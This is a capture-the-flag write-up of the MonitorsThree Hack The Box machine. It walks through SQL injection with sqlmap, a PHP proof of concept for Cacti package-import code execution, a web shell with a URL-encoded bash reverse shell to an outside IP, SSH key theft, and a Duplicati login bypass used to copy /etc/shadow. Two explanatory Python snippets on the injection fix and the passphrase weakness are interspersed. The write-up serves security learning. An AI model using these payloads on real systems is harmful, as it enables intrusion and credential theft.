MonitorsThree HTB writeup

Walkthrough for the MonitorsThree HTB machine.

Posted by xtromera on August 30, 2024 · 16 mins read

Report

Doing the usual port scanning


We get the usual 22 (SSH) and 80 (HTTP), but there is also an odd filtered port 8084; we will come back to that later.
Checking port 80, we get a redirection


Adding it to /etc/hosts.
Having a domain name means the machine may also host other subdomains or virtual hosts (vhosts).
Doing vhost fuzzing with gobuster

gobuster vhost -u="http://monitorsthree.htb" -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

We get a hit


Added to the /etc/hosts file.
Doing a directory fuzzing in the background while checking the website.

gobuster dir -u=http://monitorsthree.htb -w=/usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x txt,php,zip,html,db

The index page has nothing interesting but a single button (going for the low-hanging fruit first), and of course the source code has nothing interesting either.
Checking the login button.
Trying default credentials led to nothing.
We have two interesting pages: a login page and a forgot-password page

Checking the directory fuzzing results, we get nothing really special apart from admin, which we can check later

Firing up Burp Suite to intercept the two requests and pass them to sqlmap to automate the job

Opening Burp Suite, go to the Proxy tab and turn on intercept.
This is the login request

And here is the forgot_password request

Copying them and saving them into two separate files

Passing both to sqlmap in parallel to automate and speed things up

sqlmap -r reqLogin --batch --risk=3 --level=3

Same for the reqRecover

sqlmap -r reqRecover --batch --risk=3 --level=3

Meanwhile, trying some SQL injection payloads manually to speed things up.
I chose to begin with the forgot_password page.
Testing a lot of injection payloads, we always get the same error


Until we get something strange with this payload: 'sd -- -


Now we know how to inject our own queries: add the prefix ' and the suffix -- -, URL-encoded of course, from Burp Suite's Repeater.
Trying the famous 1=1 payload tr'OR+1=1+--+-+

Very weird…
Trying to find the number of columns with the ORDER BY method: tr'+ORDER+BY+20+--+-+

Going lower until we reach tr'+ORDER+BY+9+--+-+


This payload seems to work, but it does not display anything.
From this we can conclude that this is a blind (error-based or time-based) SQL injection with the prefix ' and the suffix -- -, and that the vulnerable page is forgot_password.
Knowing that, we can proceed with sqlmap: stop the two running processes and give sqlmap some hints to speed things up a bit
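As an added illustration, not from the original post, of why the prefix/suffix pair changes the query and what the fix looks like, here is a Python stand-in for the forgot_password lookup: a string-built query next to a parameterised one. The table and its two rows are constructed for the example, and sqlite3 is used only so it runs offline; the real application is PHP with MySQL, where the same pattern applies.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory stand-in for the application's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("admin", "admin@example.invalid"), ("marcus", "marcus@example.invalid")],
    )
    return conn


def forgot_password_vulnerable(conn: sqlite3.Connection, username: str):
    # The user-supplied value is pasted into the SQL text. A quote in the input
    # closes the string literal and "-- " comments out whatever the application
    # appends after it, which is exactly what the prefix ' and suffix -- - exploit.
    query = f"SELECT username FROM users WHERE username = '{username}'"
    try:
        return ("ok", [row[0] for row in conn.execute(query).fetchall()])
    except sqlite3.Error as exc:
        # Syntax errors (the "same error" seen during manual testing) and
        # out-of-range ORDER BY terms both surface here.
        return ("error", str(exc))


def forgot_password_safe(conn: sqlite3.Connection, username: str):
    # Parameterised query: the driver passes the value separately from the SQL
    # text, so quotes and comment markers are just characters inside the data.
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)
    ).fetchall()
    return ("ok", [row[0] for row in rows])
```

The suffix is `-- -` rather than `--` because MySQL only treats `--` as a comment when whitespace follows it; the trailing `-` keeps that space from being trimmed away. The ORDER BY probe from the post works the same way here: a term higher than the column count raises an error, a valid one returns an empty result.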

sqlmap -r req2  --batch --prefix="'" --suffix="-- -" --dbs  --technique=BEU

And we get a hit! We discover the database monitorsthree_db and end up (after a very long time due to a poor connection) extracting the following findings.



Cracking the hash, we end up with the credentials admin:greencacti2001
Trying to log in with those credentials on the admin panel
We logged in as admin, but it led nowhere.
Time to check our other vhost, cacti

We find a Cacti application, version 1.2.26.
A quick search finds a vulnerability; this link explains the exploitation.
Using this exploit, here

<?php

$xmldata = "<xml>
   <files>
       <file>
           <name>resource/test.php</name>
           <data>%s</data>
           <filesignature>%s</filesignature>
       </file>
   </files>
   <publickey>%s</publickey>
   <signature></signature>
</xml>";
$filedata = "<?php phpinfo(); ?>";
$keypair = openssl_pkey_new(); 
$public_key = openssl_pkey_get_details($keypair)["key"]; 
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");

?>

Changing the $filedata variable to

<?php system(\$_GET['cmd']); ?>

Run the PoC

php poc.php

A gzipped file, test.xml.gz, was generated
Logging in to the Cacti dashboard with the same credentials
Following the PoC, go to Import/Export > Import Package
Select the test.xml.gz file and import it
Browse to the path given, /var/www/html/cacti/resource/test.php
We get RCE.
Using a URL-encoded reverse shell payload from revshells.com and opening a nc listener, we get a connection

http://cacti.monitorsthree.htb/cacti/resource/test.php?cmd=bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27


Upgrading the shell
Searching for database credentials with linpeas.sh, we get a hit in /var/www/html/cacti/lib/installer.php
Logging in with those credentials

www-data@monitorsthree:~/html/cacti$ mysql -u cactiuser -pcactiuser

Issuing the command show databases;
Then use cacti; and show tables;
We can see an interesting table, user_auth
Issuing the command SELECT * FROM user_auth;
Found the password hash of the user marcus, who we already knew was a user on the machine from cat /etc/passwd
Cracking the hash with hashcat, we get the password in clear text
As SSH is open, we try to SSH in but get a public key error
This error means that the machine does not allow password authentication over SSH
Switching to marcus inside our reverse shell and grabbing his private SSH key
Copying the key and using it to SSH in from our local machine

The machine runs a Docker container
This explains the filtered port we found in the port scanning step
Looking at the internal open ports
The high ports are another sign of Docker running.
Performing local port forwarding with SSH

ssh -L 8200:127.0.0.1:8200 marcus@monitorsthree.htb -i id_rsa

Checking the new service running on localhost:8200
We find Duplicati, a well-known backup and storage solution.
A quick search finds a vulnerability, described here

Following the explanation, we can find the database files
Downloading the files to our local machine and analyzing them, checking the Duplicati-server.sqlite database
Checking the Option table
We find the server-passphrase the blog post was referring to.
Going to the Duplicati login page, we enter an arbitrary password and intercept the request with Burp Suite
Note the session-nonce, then open the browser console from the inspector
Entering the payload

var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);

The saltedpwd is the server-passphrase, base64-decoded and then hex-encoded.
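To make the one-liner above concrete from the defender's side, here is an added Python model (not code from the post or from Duplicati) of the challenge-response it computes. The sample passphrase and nonce are constructed, and server_verify is my assumption of what the server recomputes. What it shows is that the value stored in Duplicati-server.sqlite answers the challenge on its own, with no cleartext password involved, so that stored value is password-equivalent and the database file deserves the same protection as a password.

```python
import base64
import hashlib
import hmac
import os

# Constructed sample values (not from the box): a made-up stored server-passphrase
# and a made-up session nonce, both base64 as Duplicati's web UI carries them.
SAMPLE_SERVER_PASSPHRASE = base64.b64encode(hashlib.sha256(b"constructed-example").digest()).decode()
SAMPLE_NONCE = base64.b64encode(b"\x01\x02\x03\x04" * 8).decode()


def nonced_password(nonce_b64: str, server_passphrase_b64: str) -> str:
    """Client side: the same operation as the CryptoJS one-liner.

    CryptoJS hex-encodes the decoded nonce (WordArray + string uses the hex
    encoder), appends saltedpwd (the decoded passphrase, hex-encoded), parses
    the result back as hex and hashes it, so the bytes hashed are simply
    nonce || stored_passphrase, and the digest is returned base64-encoded.
    """
    nonce = base64.b64decode(nonce_b64)
    salted = base64.b64decode(server_passphrase_b64)
    return base64.b64encode(hashlib.sha256(nonce + salted).digest()).decode()


def server_verify(nonce_b64: str, stored_passphrase_b64: str, submitted: str) -> bool:
    """Server side as assumed here: recompute the same hash and compare in constant time."""
    expected = nonced_password(nonce_b64, stored_passphrase_b64)
    return hmac.compare_digest(expected, submitted)


def demonstrate() -> dict:
    """Show that the stored value alone satisfies the check (password-equivalent secret)."""
    nonce = SAMPLE_NONCE
    answer = nonced_password(nonce, SAMPLE_SERVER_PASSPHRASE)
    other = base64.b64encode(hashlib.sha256(b"other").digest()).decode()
    fresh_nonce = base64.b64encode(os.urandom(32)).decode()
    return {
        # Whoever holds the stored passphrase passes the login check.
        "with_stored_value": server_verify(nonce, SAMPLE_SERVER_PASSPHRASE, answer),
        # A different stored value does not.
        "with_wrong_value": server_verify(nonce, SAMPLE_SERVER_PASSPHRASE, nonced_password(nonce, other)),
        # The nonce only stops replay of an old answer; it does not protect the stored value.
        "replay_with_new_nonce": server_verify(fresh_nonce, SAMPLE_SERVER_PASSPHRASE, answer),
    }
```

The practical consequence for anyone running Duplicati is that exposure of Duplicati-server.sqlite (here reachable through the container's filesystem) is equivalent to exposure of the UI password, so the passphrase should be rotated after any such exposure and the database kept unreadable to other users.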
Running the payload, we get a base64 password
Do not forget to URL-decode the nonce taken from the request.
Paste the password into the password field, URL-encode it and forward the request
We bypassed the login page and are authenticated
Now, to escalate privileges and read root's files, we can do the following

  1. Add a new backup and configure it
  2. Give it a name and remove encryption
  3. Make the destination /source/tmp, as the host filesystem is mounted under the source folder in this Docker image
  4. For the source data, add /source/etc/shadow to the path and select it
  5. Remove the automatic backup schedule
  6. Save it
  7. Run the backup, then click on Restore and select the backup just created
  8. Select the target file, shadow
  9. Choose the target path to restore it to, here /source/tmp
  10. Restore it and check the /tmp/shadow file

The machine was pwned successfully.